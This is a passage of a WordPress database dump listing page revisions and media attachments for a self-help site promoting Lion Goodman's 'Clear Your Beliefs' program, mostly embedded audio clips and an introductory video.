(1374, 4194, '2014-08-27 14:21:41', '2014-08-27 19:21:41', '<h1 style="color: #000000;">Beliefs Beneath the Surface</h1>\r\n<h5 style="color: #000000;">This audio clip is from the <em>Clear Your Beliefs</em> eBook.</h5>\r\n<p style="color: #000000;">The clip will begin immediately. The volume control is on the left of the Player.</p>\r\n<div style="width:50%;margin:0 auto;">\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_beneathsurface-_new1.mp3"][/audio]\r\n</div>\r\n<p style="color: #000000;">"If you study anything deeply enough, you will find beliefs beneath the surface..."</p>', 'Beliefs Beneath The Surface', '', 'inherit', 'closed', 'open', '', '1328-revision-v1', '', '', '2014-08-27 14:21:41', '2014-08-27 19:21:41', '', 1328, 'http://clearyourbeliefs.com/1328-revision-v1', 0, 'revision', '', 0),
(1375, 4194, '2014-08-27 14:24:08', '2014-08-27 19:24:08', '<h1 style="color: #000000;"><strong>Good News About Your Beliefs</strong></h1>\r\n<h5 style="color: #000000;">This audio clip is from page 7 of the e-book, Clear<strong><em> Your Beliefs</em></strong>.</h5>\r\n<p style="color: #000000;">Click the PLAY button to hear the audio.</p>\r\n<p style="color: #000000;"><strong>"I’ve got some bad news and some good news about your beliefs..."</strong></p>\r\n<div style="width:50%;margin:0 auto;">\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/BCP_goodnews.mp3"][/audio]\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_beneathsurface-_new.mp3"][/audio]\r\n</div>', 'Good News and Bad', '', 'inherit', 'closed', 'open', '', '1332-revision-v1', '', '', '2014-08-27 14:24:08', '2014-08-27 19:24:08', '', 1332, 'http://clearyourbeliefs.com/1332-revision-v1', 0, 'revision', '', 0),
(1376, 4194, '2014-08-27 14:27:14', '2014-08-27 19:27:14', '<h1 style="color: #000000;"><strong>A Well-Hidden Secret -- Revealed!</strong></h1>\n<h5 style="color: #000000;">This audio clip is from page 12 of the e-book, <strong><em>Transform Your Beliefs</em></strong>.</h5>\n<h5 style="color: #000000;">The clip will begin immediately. The volume control is on the left of the Player.</h5>\n<p style="color: #000000;"></p>\n<div style="width:50%;margin:0 auto;">\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_secretrevealed1.mp3"][/audio]\n<h2 style="color: #000000;">"By studying consciousness directly, I learned how we create our own experience of reality – and how to shift it..."</h2>\n&nbsp;', 'Well Hidden Secret', '', 'inherit', 'closed', 'open', '', '1330-autosave-v1', '', '', '2014-08-27 14:27:14', '2014-08-27 19:27:14', '', 1330, 'http://clearyourbeliefs.com/1330-autosave-v1', 0, 'revision', '', 0),
(1377, 4194, '2014-08-27 14:26:36', '2014-08-27 19:26:36', '"bcp_secretrevealed" from Belief Closet Process by Lion Goodman. Released: 2010. Genre: Self-help.', 'bcp_secretrevealed', '', 'inherit', 'closed', 'open', '', 'bcp_secretrevealed-2', '', '', '2014-08-27 14:26:36', '2014-08-27 19:26:36', '', 1330, 'http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_secretrevealed1.mp3', 0, 'attachment', 'audio/mpeg', 0),
(1378, 4194, '2014-08-27 14:27:23', '2014-08-27 19:27:23', '<h1 style="color: #000000;"><strong>A Well-Hidden Secret -- Revealed!</strong></h1>\r\n<h5 style="color: #000000;">This audio clip is from page 12 of the e-book, <strong><em>Transform Your Beliefs</em></strong>.</h5>\r\n<h5 style="color: #000000;">The clip will begin immediately. The volume control is on the left of the Player.</h5>\r\n<p style="color: #000000;"></p>\r\n<div style="width:50%;margin:0 auto;">\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_secretrevealed1.mp3"][/audio]\r\n</div>\r\n<h2 style="color: #000000;">"By studying consciousness directly, I learned how we create our own experience of reality – and how to shift it..."</h2>\r\n&nbsp;', 'Well Hidden Secret', '', 'inherit', 'closed', 'open', '', '1330-revision-v1', '', '', '2014-08-27 14:27:23', '2014-08-27 19:27:23', '', 1330, 'http://clearyourbeliefs.com/1330-revision-v1', 0, 'revision', '', 0),
(1379, 4194, '2014-09-08 19:12:00', '2014-09-09 00:12:00', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\n<strong>(Video)</strong></h1>\n&nbsp;\n\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\n\nClick below to start the video.\n<div style="width: 50%; margin: 0 auto;">\n <video width="320" height="240" controls>\n  <source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSKvideo1.mp4" type="video/mp4">\n<source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSKvideo.webm" type="video/webm">\nYour browser does not support the video tag.\n</video>\n<!h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2>\n</div>\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-autosave-v1', '', '', '2014-09-08 19:12:00', '2014-09-09 00:12:00', '', 1340, 'http://clearyourbeliefs.com/1340-autosave-v1', 0, 'revision', '', 0),
(1380, 4194, '2014-08-27 14:31:54', '2014-08-27 19:31:54', '<h1 style="color: #000000; text-align: center;">Introducing <em>The BeliefCloset Process</em> (Video)</h1>\r\n&nbsp;\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/JSK Video Final.mov"][/audio]\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-08-27 14:31:54', '2014-08-27 19:31:54', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1382, 4194, '2014-08-27 14:36:16', '2014-08-27 19:36:16', '<h1 style="color: #000000; text-align: center;">Introducing <em>The BeliefCloset Process</em> (Video)</h1>\r\n&nbsp;\r\n<div style="width: 50%; margin: 0 auto;">\r\nhi\r\n\r\nbye\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-08-27 14:36:16', '2014-08-27 19:36:16', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1381, 4194, '2014-08-27 14:33:20', '2014-08-27 19:33:20', '<h1 style="color: #000000; text-align: center;">Introducing <em>The BeliefCloset Process</em> (Video)</h1>\r\n&nbsp;\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/JSK%20Video%20Final.mov"][/audio]\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-08-27 14:33:20', '2014-08-27 19:33:20', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1383, 4194, '2014-08-27 14:36:54', '2014-08-27 19:36:54', '<h1 style="color: #000000; text-align: center;">Introducing <em>The BeliefCloset Process</em> (Video)</h1>\r\n&nbsp;\r\n<div style="width: 50%; margin: 0 auto;">[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/JSK%20Video%20Final.mov"][/audio]\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-08-27 14:36:54', '2014-08-27 19:36:54', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1385, 4194, '2014-08-27 14:41:04', '2014-08-27 19:41:04', '<h1 style="color: #000000; text-align: center;">Introducing <em>The BeliefCloset Process</em> (Video)</h1>\r\n&nbsp;\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK%20Video%20Final.mov"][/audio]\r\n\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-08-27 14:41:04', '2014-08-27 19:41:04', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1384, 4194, '2014-08-27 14:39:24', '2014-08-27 19:39:24', '<h1 style="color: #000000; text-align: center;">Introducing <em>The BeliefCloset Process</em> (Video)</h1>\r\n&nbsp;\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/JSK%20Video%20Final.mov"][/audio]\r\n\r\n</div>\r\n&nbsp;\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/JSK%20Video%20Final.mov">Intro Video</a>', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-08-27 14:39:24', '2014-08-27 19:39:24', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1386, 4194, '2014-08-27 16:25:27', '2014-08-27 21:25:27', '<h1 style="color: #000000; text-align: center;">Introducing <em>The BeliefCloset Process</em> (Video)</h1>\r\n&nbsp;\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK%20Video%20Final.mov">Intro Video</a>\r\n\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-08-27 16:25:27', '2014-08-27 21:25:27', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1387, 2, '2014-08-30 23:29:08', '2014-08-31 04:29:08', '<h1 style="color: #000000;">Beliefs Beneath the Surface</h1>\r\n<h5 style="color: #000000;">This audio clip is from the <em>Clear Your Beliefs</em> eBook.</h5>\r\n<p style="color: #000000;">Press the Play button to start the clip. The volume control is on the right side of the Player.</p>\r\n\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_beneathsurface-_new1.mp3"][/audio]\r\n\r\n</div>\r\n<p style="color: #000000;">"If you study anything deeply enough, you will find beliefs beneath the surface..."</p>', 'Beliefs Beneath The Surface', '', 'inherit', 'closed', 'open', '', '1328-revision-v1', '', '', '2014-08-30 23:29:08', '2014-08-31 04:29:08', '', 1328, 'http://clearyourbeliefs.com/1328-revision-v1', 0, 'revision', '', 0),
(1389, 2, '2014-08-31 23:55:18', '2014-09-01 04:55:18', '<h1 style="color: #000000;"><strong>Good News About Your Beliefs</strong></h1>\r\n<h5 style="color: #000000;">This audio clip is from the <em>Clear<strong> Your Beliefs </strong></em><strong>ebook.  C</strong>lick the PLAY button to hear the audio.</h5>\r\n<p style="color: #000000;"><strong>"I’ve got some bad news and some good news about your beliefs..."</strong></p>\r\n\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/BCP_goodnews.mp3"][/audio]\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_beneathsurface-_new.mp3"][/audio]\r\n\r\n</div>', 'Good News and Bad', '', 'inherit', 'closed', 'open', '', '1332-revision-v1', '', '', '2014-08-31 23:55:18', '2014-09-01 04:55:18', '', 1332, 'http://clearyourbeliefs.com/1332-revision-v1', 0, 'revision', '', 0),
(1390, 2, '2014-08-31 23:56:40', '2014-09-01 04:56:40', '<h1 style="color: #000000;"><strong>Good News About Your Beliefs</strong></h1>\r\n<h5 style="color: #000000;">This audio clip is from the <em>Clear<strong> Your Beliefs </strong></em><strong>ebook.\r\n\r\n</strong><strong style="line-height: 1.3333333333;">C</strong><span style="line-height: 1.3333333333;">lick the P</span><span style="line-height: 1.3333333333;">lay</span><span style="line-height: 1.3333333333;"> button to hear the audio.</span></h5>\r\nThe volume control is on the right of the player.\r\n<p style="color: #000000;"><strong>"I’ve got some bad news and some good news about your beliefs..."</strong></p>\r\n\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/BCP_goodnews.mp3"][/audio]\r\n\r\n</div>', 'Good News and Bad', '', 'inherit', 'closed', 'open', '', '1332-revision-v1', '', '', '2014-08-31 23:56:40', '2014-09-01 04:56:40', '', 1332, 'http://clearyourbeliefs.com/1332-revision-v1', 0, 'revision', '', 0),
(1391, 2, '2014-11-12 16:56:51', '2014-11-12 21:56:51', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\n<strong>(Video)</strong></h1>\n&nbsp;\n\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\n\nClick below to start the video.\n<div style="width: 85%; margin: 0 auto;">\n[video width="832" height="480" flv="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK-Video-Final.flv"][/video]\n<!--h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2--></div>\n\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-autosave-v1', '', '', '2014-11-12 16:56:51', '2014-11-12 21:56:51', '', 1340, 'http://clearyourbeliefs.com/1340-autosave-v1', 0, 'revision', '', 0),
(1392, 2, '2014-09-01 00:14:43', '2014-09-01 05:14:43', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\n<p>In this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.</p>\r\n\r\n&nbsp;\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK%20Video%20Final.mov">Intro Video</a>\r\n\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-01 00:14:43', '2014-09-01 05:14:43', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1393, 2, '2014-09-01 00:15:30', '2014-09-01 05:15:30', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n<h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK%20Video%20Final.mov">Intro Video</a></h2>\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-01 00:15:30', '2014-09-01 05:15:30', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1715, 2, '2014-11-12 17:19:02', '2014-11-12 22:19:02', '<h1 style="text-align: center;">A Sample from Session One of Clear Your Beliefs</h1>\r\n<strong>This ten-minute excerpt gives you a taste of what awaits you in the <em>Clear Your Beliefs</em> program.\r\n\r\n</strong>\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip1.mp3"][/audio]\r\n\r\n<strong> </strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Session One Excerpt', '', 'inherit', 'closed', 'open', '', '1288-revision-v1', '', '', '2014-11-12 17:19:02', '2014-11-12 22:19:02', '', 1288, 'http://clearyourbeliefs.com/1288-revision-v1', 0, 'revision', '', 0),
(1395, 2, '2014-09-01 00:19:56', '2014-09-01 05:19:56', '"1-Clear Your Beliefs-01-10 min clip". Released: 2014.', '1-Clear Your Beliefs-01-10 min clip', '', 'inherit', 'closed', 'open', '', '1-clear-your-beliefs-01-10-min-clip', '', '', '2014-09-01 00:19:56', '2014-09-01 05:19:56', '', 1288, 'http://clearyourbeliefs.com/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip.mp3', 0, 'attachment', 'audio/mpeg', 0),
(1396, 2, '2014-09-01 00:20:26', '2014-09-01 05:20:26', '<h1 style="text-align: center;">A Sample from Session One of\r\nClear Your Beliefs</h1>\r\n<strong>This ten-minute excerpt gives you a taste of what awaits you in the <em>Clear Your Beliefs</em> program.</strong>\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip.mp3"][/audio]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Session One Excerpt', '', 'inherit', 'closed', 'open', '', '1288-revision-v1', '', '', '2014-09-01 00:20:26', '2014-09-01 05:20:26', '', 1288, 'http://clearyourbeliefs.com/1288-revision-v1', 0, 'revision', '', 0),
(1397, 2, '2014-09-01 00:21:43', '2014-09-01 05:21:43', '<h1 style="text-align: center;">A Sample from Session One of Clear Your Beliefs</h1>\r\n<strong>This ten-minute excerpt gives you a taste of what awaits you in the <em>Clear Your Beliefs</em> program.\r\n\r\n</strong>\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip.mp3"][/audio]\r\n\r\n<strong> </strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Session One Excerpt', '', 'inherit', 'closed', 'open', '', '1288-revision-v1', '', '', '2014-09-01 00:21:43', '2014-09-01 05:21:43', '', 1288, 'http://clearyourbeliefs.com/1288-revision-v1', 0, 'revision', '', 0),
(1398, 2, '2014-09-01 00:26:16', '2014-09-01 05:26:16', '<h1 style="color: #000000;"><strong>A Well-Hidden Secret -- Revealed!</strong></h1>\n<h5 style="color: #000000;">This audio clip is from the <em>Clear Your Beliefs</em> eBook.</h5>\n<h5 style="color: #000000;">Click Play to begin the audio.  The volume control is on the right of the Player.</h5>\n<div style="width: 50%; margin: 0 auto;">\n\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_secretrevealed1.mp3"][/audio]\n\n</div>\n<h2 style="color: #000000;">"By studying consciousness directly, I learned how we create our own experience of reality – and how to shift it..."</h2>\n&nbsp;', 'Well Hidden Secret', '', 'inherit', 'closed', 'open', '', '1330-autosave-v1', '', '', '2014-09-01 00:26:16', '2014-09-01 05:26:16', '', 1330, 'http://clearyourbeliefs.com/1330-autosave-v1', 0, 'revision', '', 0),
(1399, 2, '2014-09-01 00:26:35', '2014-09-01 05:26:35', '<h1 style="color: #000000;"><strong>A Well-Hidden Secret -- Revealed!</strong></h1>\r\n<h5 style="color: #000000;">This audio clip is from the <em>Clear Your Beliefs</em> eBook.</h5>\r\n<h5 style="color: #000000;">Click Play to begin the audio.  The volume control is on the right of the Player.</h5>\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_secretrevealed1.mp3"][/audio]\r\n\r\n</div>\r\n<p style="color: #000000;"><strong>"By studying consciousness directly, I learned how we create our own experience of reality – and how to shift it..."</strong></p>\r\n&nbsp;', 'Well Hidden Secret', '', 'inherit', 'closed', 'open', '', '1330-revision-v1', '', '', '2014-09-01 00:26:35', '2014-09-01 05:26:35', '', 1330, 'http://clearyourbeliefs.com/1330-revision-v1', 0, 'revision', '', 0),
(1400, 2, '2014-09-01 00:30:04', '2014-09-01 05:30:04', '<h1 style="color: #000000;"><strong>A Well-Hidden Secret -- Revealed!</strong></h1>\r\n<h5 style="color: #000000; text-align: center;">This audio clip is from the <em>Clear Your Beliefs</em> eBook.</h5>\r\n<h5 style="color: #000000; text-align: center;">Click Play to begin the audio.  The volume control is on the right of the Player.</h5>\r\n<div style="width: 50%; margin: 0px auto; text-align: center;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_secretrevealed1.mp3"][/audio]\r\n\r\n</div>\r\n<p style="color: #000000; text-align: center;"><strong>\r\n"By studying consciousness directly, I learned how we create our own experience of reality – and how to change it..."</strong></p>\r\n&nbsp;', 'Well Hidden Secret', '', 'inherit', 'closed', 'open', '', '1330-revision-v1', '', '', '2014-09-01 00:30:04', '2014-09-01 05:30:04', '', 1330, 'http://clearyourbeliefs.com/1330-revision-v1', 0, 'revision', '', 0),
(1401, 4194, '2014-09-08 16:57:55', '2014-09-08 21:57:55', '', 'Clear Your Beliefs - Lion Goodman', '', 'inherit', 'closed', 'open', '', 'clear-your-beliefs-lion-goodman', '', '', '2014-09-08 16:57:55', '2014-09-08 21:57:55', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/09/Clear-Your-Beliefs-Lion-Goodman.mobi', 0, 'attachment', 'application/x-mobipocket-ebook', 0),
(1402, 4194, '2014-09-08 16:58:21', '2014-09-08 21:58:21', '', 'Clear Your Beliefs - Lion Goodman', '', 'inherit', 'closed', 'open', '', 'clear-your-beliefs-lion-goodman-2', '', '', '2014-09-08 16:58:21', '2014-09-08 21:58:21', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/09/Clear-Your-Beliefs-Lion-Goodman.epub', 0, 'attachment', 'application/epub+zip', 0),
(1403, 4194, '2014-09-08 18:48:09', '2014-09-08 23:48:09', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n<h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JJSKvideo.mp4">Intro Video</a></h2>\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-08 18:48:09', '2014-09-08 23:48:09', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1404, 4194, '2014-09-08 18:49:09', '2014-09-08 23:49:09', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n<h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo.mp4">Intro Video</a></h2>\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-08 18:49:09', '2014-09-08 23:49:09', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1405, 4194, '2014-09-08 18:50:24', '2014-09-08 23:50:24', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n<h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2>\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-08 18:50:24', '2014-09-08 23:50:24', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1406, 4194, '2014-09-08 18:54:43', '2014-09-08 23:54:43', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n<video id="sampleMovie" src="JSK%20Video%20final.mov" controls></video>\r\n<h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2>\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-08 18:54:43', '2014-09-08 23:54:43', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1407, 4194, '2014-09-08 18:55:18', '2014-09-08 23:55:18', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n<video id="sampleMovie" src="JSKvideo.mp4" controls></video>\r\n<h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2>\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-08 18:55:18', '2014-09-08 23:55:18', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1408, 4194, '2014-09-08 18:57:31', '2014-09-08 23:57:31', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n<video id="sampleMovie" src="JSKvideo1.mp4" controls></video>\r\n<h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2>\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-08 18:57:31', '2014-09-08 23:57:31', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1409, 4194, '2014-09-08 18:58:41', '2014-09-08 23:58:41', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n <video width="320" height="240" controls>\r\n  <source src="JSKvideo1.mp4" type="video/mp4">\r\n  <source src="movie.ogg" type="video/ogg">\r\nYour browser does not support the video tag.\r\n</video> </video>\r\n<h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2>\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-08 18:58:41', '2014-09-08 23:58:41', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1411, 4194, '2014-09-08 19:02:21', '2014-09-09 00:02:21', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n <video width="320" height="240" controls>\r\n  <source src="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4" type="video/mp4">\r\nYour browser does not support the video tag.\r\n</video>\r\n<h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2>\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-08 19:02:21', '2014-09-09 00:02:21', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
